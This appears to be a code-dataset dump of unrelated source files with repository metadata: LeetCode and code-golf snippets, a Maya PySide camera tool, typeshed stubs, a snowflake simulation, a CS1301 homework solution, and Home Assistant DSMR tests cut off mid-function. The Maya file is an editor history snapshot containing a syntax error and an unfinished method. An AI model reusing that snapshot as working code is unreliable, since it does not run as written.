#if not jogueNovamente():
#break
| [
"[email protected]"
] | |
af8822c01c2eae258d213fcd4fb4dabd0f0f483b | 9a9e0398f26cee9864d48c4618c0a482e5475e83 | /Python/code/design_browser_history.py | 21040767673ace8a3036f93a95df6462006bd225 | [] | no_license | CNife/leetcode | 92693c653bb41780ee431293286c3e909009e9b0 | 7cdd61692ecb52dd1613169e80b924dd39d35996 | refs/heads/main | 2021-06-22T21:22:12.997253 | 2021-03-18T07:07:15 | 2021-03-18T07:07:15 | 206,955,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py | from typing import List
class BrowserHistory:
def __init__(self, homepage: str):
self.stack: List[str] = [homepage]
self.pointer: int = 0
def visit(self, url: str) -> None:
if self.pointer < len(self.stack) - 1:
self.stack[self.pointer + 1] = url
del self.stack[self.pointer + 2 :]
else:
self.stack.append(url)
self.pointer += 1
def back(self, steps: int) -> str:
back_pointer = max(self.pointer - steps, 0)
self.pointer = back_pointer
return self.stack[back_pointer]
def forward(self, steps: int) -> str:
forward_pointer = min(self.pointer + steps, len(self.stack) - 1)
self.pointer = forward_pointer
return self.stack[forward_pointer]
b = BrowserHistory("leetcode.com")
b.visit("google.com")
b.visit("facebook.com")
b.visit("youtube.com")
assert b.back(1) == "facebook.com"
assert b.back(1) == "google.com"
assert b.forward(1) == "facebook.com"
b.visit("linkedin.com")
assert b.forward(2) == "linkedin.com"
assert b.back(2) == "google.com"
assert b.back(7) == "leetcode.com"
| [
"[email protected]"
] | |
6e5c1b6b90f3961a988d8bfcdf41f2994f72480b | b6c4c71dd1544bfc6bc364b4242e9b76401e7372 | /ebicochineal/yukicoder/g81.py | 2e1d5cfc8ad06f1f4c36fda82b6ff2d262b58410 | [] | no_license | ebi-cp/golf | b248f9a7b1a09e6d6c90e141ae5ce1cacbf7c665 | 4ea8f8456fd926051aadc1e88e4014585f483997 | refs/heads/master | 2020-03-17T20:53:06.910302 | 2019-06-20T01:47:59 | 2019-06-20T01:47:59 | 133,932,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | #! /usr/bin/env python3
from decimal import*
print('{:.10f}'.format(eval("+Decimal(input())"*int(input()))))
| [
"[email protected]"
] | |
8f531582e923fb0fb0831e88beb903ecdecbc8a3 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190119190257.py | 89fe9b62ef2019192a357e1a4849c612a4a637d1 | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,985 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
import plugin.Qt as Qt
if Qt.__binding__.startswith('PyQt'):
from Qt import _uic as uic
return uic.loadUiType(uiFile)
elif Qt.__binding__ == 'PySide':
import pysideuic as uic
else:
import pyside2uic as uic
import xml.etree.ElementTree as xml
from cStringIO import StringIO
parsed = xml.parse(uiFile)
widget_class = parsed.find('widget').get('class')
form_class = parsed.find('class').text
with open(uiFile, 'r') as f:
o = StringIO()
frame = {}
uic.compileUi(f, o, indent=0)
pyc = compile(o.getvalue(), '<string>', 'exec')
exec pyc in frame
# Fetch the base_class and form class based on their type
# in the xml from designer
form_class = frame['Ui_%s'%form_class]
base_class = eval('%s'%widget_class)
return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
from maya import cmds
class Cam_Item_Layout(form_class,base_class):
def __init__(self,MainWindow):
super(Cam_Item_Layout,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)
self.Cam_Item_Num = 0
self.Cam_Item_Scroll.verticalScrollBar().valueChanged.connect(self.Scroll_Fn)
self.Scroll_Offset = 0
self.Attr = {}
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Name"] = ""
# Note 功能按键
self.Batch_Keyframe_BTN.clicked.connect(self.Batch_Keyframe_Fn)
self.Select_Path_BTN.clicked.connect(self.Select_Path_Fn)
def Batch_Keyframe_Fn(self):
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
Path = child.Attr["Add_Motion_Path_LE"]
if cmds.objExists(Path):
offset = cmds.keyframe(Path,q=1)[0]
cmds.keyframe("%s.uValue"% Path,e=1,iub=1,r=1,o="over",tc=-offset)
def Select_Path_Fn(self):
cmds.select(cl=1)
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
if cmds.objExists(child.Attr["Add_Motion_Path_LE"]):
cmds.select(child.Attr["Add_Motion_Path_LE"],add=1)
def Item_Add_Fn(self):
self.Cam_Item_Num += 1
return Cam_Item(self,self.MainWindow)
def Item_Clear_Fn(self):
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Name"] = ""
for i,child in enumerate(self.Item_Layout.children()):
if i != 0:
child.deleteLater()
def Scroll_Fn(self):
self.Scroll_Offset = self.Cam_Item_Scroll.verticalScrollBar().value()
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class,base_class):
def __init__(self,parent,MainWindow):
super(Cam_Item,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
self.Cam_Con_CB.stateChanged.connect(self.Cam_Con_CB_Fn)
# Note 初始化创建参数
TotalCount = len(parent.Item_Layout.children())
parent.Item_Layout.layout().insertWidget(TotalCount-1,self)
self.Cam_LE.setText("Cam_Item_%s" % parent.Cam_Item_Num)
self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
self.setObjectName("Cam_Item_%s" % TotalCount)
self.Num = TotalCount
self.Attr = {}
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = 0
self.Attr["End_Time_SB"] = 0
self.MainWindow.Save_Json_Fun()
def Cam_Del_BTN_Fn(self):
self.deleteLater()
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if i > self.Num:
# Note 修正 child 的序号
child.Num -= 1
child.Cam_Num_Label.setText(u"镜头%s" % (i-1))
child.setObjectName("Cam_Item_%s" % (i-1))
else:
child.Cam_Num_Label.setText(u"镜头%s" % i)
child.setObjectName("Cam_Item_%s" % i)
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = ""
self.Attr["End_Time_SB"] = ""
self.MainWindow.Save_Json_Fun()
def Cam_Con_CB_Fn(self,state):
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(True)
child.Cam_Con_CB.setChecked(False)
if state == 0:
self.Cam_Con_CB.setChecked(True)
else
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(False)
| [
"[email protected]"
] | |
ab8798f43f4e62010d729812993d84aa181dc52b | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/python-jose/jose/jws.pyi | 777770ae62ba7928c9ecd32abfe7fdcce15fb17d | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 939 | pyi | from collections.abc import Container, Mapping
from typing import Any
from .backends.base import Key
def sign(
payload: bytes | Mapping[str, Any],
# Internally it's passed down to jwk.construct(), which explicitly checks for
# key as dict instance, instead of a Mapping
key: str | bytes | dict[str, Any] | Key,
headers: Mapping[str, Any] | None = None,
algorithm: str = "HS256",
) -> str: ...
def verify(
token: str | bytes,
key: str | bytes | Mapping[str, Any] | Key,
# Callers of this function, like jwt.decode(), and functions called internally,
# like jws._verify_signature(), use and accept algorithms=None
algorithms: str | Container[str] | None,
verify: bool = True,
) -> bytes: ...
def get_unverified_header(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_headers(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_claims(token: str | bytes) -> bytes: ...
| [
"[email protected]"
] | |
83dee180bba344ba4431b5eddabacca981be46a9 | ea378480ba678eb123ef826e3ca0c3eb8f4e538f | /py ref/agg:PIL/05-snowflake.py | 685698ad5cd2aee1ad26a0569fba738e94d596b8 | [] | no_license | msarch/py | 67235643666b1ed762d418263f7eed3966d3f522 | dcd25e633a87cdb3710e90224e5387d3516c1cd3 | refs/heads/master | 2021-01-01T05:21:58.175043 | 2017-05-25T08:15:26 | 2017-05-25T08:15:26 | 87,453,820 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # Snowflake Simulation Using Reiter Cellular Automata
# Source: "A Local Cellular Model for Snow Crystal Growth" by Cliff Reiter
# FB36 - 20130107
import math
import random
from PIL import Image, ImageDraw
imgx = 500; imgy = 500 # image size
imgx1 = imgx - 1; imgy1 = imgy - 1
image = Image.new("RGB", (imgx, imgy))
draw = ImageDraw.Draw(image)
pixels = image.load()
maxIt = 10 # of growth steps
# snowflake will differ depending on values of these parameters:
alpha = random.random() * 1.5 + 0.5
beta = random.random() * 0.3 + 0.3
gamma = random.random() * 0.01
mx = 250; my = 250 # width and height of 2DCA
ca = [[beta for x in range(mx)] for y in range(my)]
caRep = [[beta for x in range(mx)] for y in range(my)] # receptive cells
caNRep = [[beta for x in range(mx)] for y in range(my)] # non-receptive cells
dx = [-1, 0, -1, 1, 0, 1]; dy = [-1, -1, 0, 0, 1, 1] # 6 directions to grow
# these are for coloring the image
while True:
mr0 = 2 ** random.randint(3, 6); mr1 = 256 / mr0
mg0 = 2 ** random.randint(3, 6); mg1 = 256 / mg0
mb0 = 2 ** random.randint(3, 6); mb1 = 256 / mb0
if mr0 != mg0 and mr0 != mb0 and mg0 != mb0: break
ca[(my - 1) / 2][(mx - 1) / 2] = 1.0 # ice seed
for i in range(maxIt): # growth steps
print "Growth Step: " + str(i + 1) + " of " + str(maxIt)
# separate the array into receptive and non-receptive arrays
for iy in range(my):
for ix in range(mx):
receptive = False
if ca[iy][ix] >= 1.0: # ice
receptive = True
else: # check neighbors
for j in range(6):
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
if ca[jy][jx] >= 1.0: # ice
receptive = True
break
if receptive:
caRep[iy][ix] = ca[iy][ix] + gamma
caNRep[iy][ix] = 0.0
else:
caRep[iy][ix] = 0.0
caNRep[iy][ix] = ca[iy][ix]
# new array: weighed averages of the non-receptive array + receptive array
for iy in range(my):
for ix in range(mx):
wsum = caNRep[iy][ix] * (1.0 - alpha * 6.0 / 12.0)
for j in range(6): # neighbors
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
wsum += caNRep[jy][jx] * alpha / 12.0
ca[iy][ix] = caRep[iy][ix] + wsum
# paint final state of the snowflake
an45 = - math.pi / 4.0
sn45 = math.sin(an45); cs45 = math.cos(an45)
scale = math.sqrt(3.0); ox = imgx1 / 2.0; oy = imgy1 / 2.0
for ky in range(imgy):
for kx in range(imgx):
# apply geometric transformation (scaling and rotation)
print ky,kx
tx = kx - ox; ty = (ky - oy) * scale
tx0 = tx * cs45 - ty * sn45 + ox
ty = tx * sn45 + ty * cs45 + oy; tx = tx0
if tx >= 0 and tx <= imgx1 and ty >= 0 and ty <= imgy1:
c = ca[int((my - 1) * ty / imgy1)][int((mx - 1) * tx / imgx1)]
if c >= 1.0: # ice
c = int((c - 1.0) * 255)
pixels[kx, ky] = (c % mr0 * mr1, c % mg0 * mg1, c % mb0 * mb1)
label = "alpha = " + str(alpha) + " beta = " + str(beta) + " gamma = " + str(gamma)
draw.text((0, 0), label, (0, 255, 0)) # write to top-left using green color
image.save("Snowflake.png", "PNG")
print "done" | [
"[email protected]"
] | |
c26ce4af3e3326663a505c3563633472e49af3ec | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW06_20210715232125.py | 82e83460b2b3572ef7ede77011ce58249bbfcda0 | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,842 | py | """
Georgia Institute of Technology - CS1301
HW06 - Text Files & CSV
Collaboration Statement:
"""
#########################################
"""
Function Name: findCuisine()
Parameters: filename (str), cuisine (str)
Returns: list of restaurants (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def findCuisine(filename, cuisine):
file = open(filename,'r')
content = file.readlines()
listOfRestaurants = []
for i in range(len(content)):
if content[i].strip() == cuisine:
listOfRestaurants.append(content[i-1].strip()) #add the name of the restaurant, which is the previous line
file.close()
return listOfRestaurants
"""
Function Name: restaurantFilter()
Parameters: filename (str)
Returns: dictionary that maps cuisine type (str)
to a list of restaurants of the same cuisine type (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def restaurantFilter(filename):
dict = {}
file = open(filename,'r')
content = file.readlines()
cuisines = []
for i in range(1,len(content),4):
line = content[i].strip()
if line not in cuisines:
cuisines.append(line)
for i in range(len(cuisines)):
dict[cuisines[i]] = []
for i in range(0,len(content),4):
line = content[i].strip()
lineBelow = content[i+1].strip()
dict[lineBelow].append(line)
return dict
"""
Function Name: createDirectory()
Parameters: filename (str), output filename (str)
Returns: None (NoneType)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def createDirectory(filename, outputFilename):
readFile = open(filename, 'r')
writeFile = open(outputFilename, 'w')
content = readFile.readlines()
fastfood = []
sitdown = []
fastfoodcounter = 1
sitdowncouter = 1
for i in range(2,len(content), 4):
restaurant = content[i-2].strip()
cuisine = content[i-1].strip()
group = content[i].strip()
if group == 'Fast Food':
fastfood.append(str(fastfoodcounter) + '. ' + restaurant + ' - ' + cuisine + '\n')
fastfoodcounter += 1
else:
sitdown.append(str(sitdowncouter) + '. ' + restaurant + ' - ' + cuisine)
sitdowncouter += 1
writeFile.write('Restaurant Directory' + '\n')
writeFile.write('Fast Food' + '\n')
writeFile.writelines(fastfood)
writeFile.write('Sit-down' + '\n')
for i in range(len(sitdown)):
if i != len(sitdown)-1:
writeFile.write(sitdown[i] + '\n')
else:
writeFile.write(sitdown[i])
"""
Function Name: extraHours()
Parameters: filename (str), hour (int)
Returns: list of (person, extra money) tuples (tuple)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def extraHours(filename, hour):
overtime = []
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
name = line[0]
wage = int(line[2])
hoursWorked = int(line[4])
if hoursWorked > hour:
compensation = (hoursWorked - hour) * wage
overtime.append((name, compensation))
return overtime
"""
Function Name: seniorStaffAverage()
Parameters: filename (str), year (int)
Returns: average age of senior staff members (float)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def seniorStaffAverage(filename, year):
averageAge = 0.0
employeeCount = 0
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
yearHired = int(line[3])
if yearHired < year:
averageAge += age
employeeCount += 1
averageAge /= employeeCount
return round(averageAge,2)
"""
Function Name: ageDict()
Parameters: filename (str), list of age ranges represented by strings (list)
Returns: dictionary (dict) that maps each age range (str) to a list of employees (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def ageDict(filename, ageRangeList):
employeeAgeDictionary = {}
newDict = {}
ageRangesFormatted = []
for i in ageRangeList:
employeeAgeDictionary[i] = []
# print(employeeAgeDictionary)
for i in ageRangeList:
ageRangesFormatted.append(i.split('-'))
# print(ageRangesFormatted)
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
name = line[0]
for j in ageRangesFormatted:
if age >= int(j[0]) and age <= int(j[1]):
employeeAgeDictionary[j[0] + '-' + j[1]].append(name)
for i in employeeAgeDictionary:
if employeeAgeDictionary[i] != []:
newDict[i] = employeeAgeDictionary[i]
return newDict
# print(findCuisine('restaurants.txt', 'Mexican'))
# print(restaurantFilter('restaurants.txt'))
# print(createDirectory('restaurants.txt','output.txt'))
# print(extraHours('employees.csv', 40))
# print(seniorStaffAverage('employees.csv', 2019))
# rangeList = ["20-29", "30-39"]
# print(ageDict('employees.csv', rangeList))
# print(ageDict('employees.csv', ['0-18', '18-19']))
| [
"[email protected]"
] | |
8498795049bcc029a2c71a310a2525dd63063293 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_commoners.py | ba7756247f776e21069b78a695be616e5b343ce5 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _COMMONERS():
def __init__(self,):
self.name = "COMMONERS"
self.definitions = commoner
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['commoner']
| [
"[email protected]"
] | |
cc560822ef2d48813402158877c3e00ff38a8fb7 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/dsmr/test_config_flow.py | 8ad7c7214a3c8c39e9e6f051c5814db922a12dea | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 19,514 | py | """Test the DSMR config flow."""
import asyncio
from itertools import chain, repeat
import os
from unittest.mock import DEFAULT, AsyncMock, MagicMock, patch, sentinel
import serial
import serial.tools.list_ports
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.dsmr import DOMAIN, config_flow
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry
SERIAL_DATA = {"serial_id": "12345678", "serial_id_gas": "123456789"}
SERIAL_DATA_SWEDEN = {"serial_id": None, "serial_id_gas": None}
def com_port():
"""Mock of a serial port."""
port = serial.tools.list_ports_common.ListPortInfo("/dev/ttyUSB1234")
port.serial_number = "1234"
port.manufacturer = "Virtual serial port"
port.device = "/dev/ttyUSB1234"
port.description = "Some serial port"
return port
async def test_setup_network(
hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup network."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Network"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_network"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
},
)
await hass.async_block_till_done()
entry_data = {
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "10.10.0.1:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_setup_network_rfxtrx(
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test we can setup network."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Network"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_network"
assert result["errors"] == {}
# set-up DSMRProtocol to yield no valid telegram, this will retry with RFXtrxDSMRProtocol
protocol.telegram = {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
},
)
await hass.async_block_till_done()
entry_data = {
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
"protocol": "rfxtrx_dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "10.10.0.1:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_rfxtrx(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test we can setup serial."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
# set-up DSMRProtocol to yield no valid telegram, this will retry with RFXtrxDSMRProtocol
protocol.telegram = {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "2.2",
"protocol": "rfxtrx_dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_5L(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "5L"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "5L",
"protocol": "dsmr_protocol",
"serial_id": "12345678",
"serial_id_gas": "123456789",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_5S(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": port.device, "dsmr_version": "5S"}
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "5S",
"protocol": "dsmr_protocol",
"serial_id": None,
"serial_id_gas": None,
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_Q3D(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "Q3D"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "Q3D",
"protocol": "dsmr_protocol",
"serial_id": "12345678",
"serial_id_gas": None,
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_manual(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial with manual entry."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": "Enter Manually", "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial_manual_path"
assert result["errors"] is None
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": "/dev/ttyUSB0"}
)
await hass.async_block_till_done()
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_fail(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test failed serial connection."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
# override the mock to have it fail the first time and succeed after
first_fail_connection_factory = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([serial.serialutil.SerialException], repeat(DEFAULT)),
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch(
"homeassistant.components.dsmr.config_flow.create_dsmr_reader",
first_fail_connection_factory,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_connect"}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_timeout(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test failed serial connection."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
(
connection_factory,
transport,
rfxtrx_protocol,
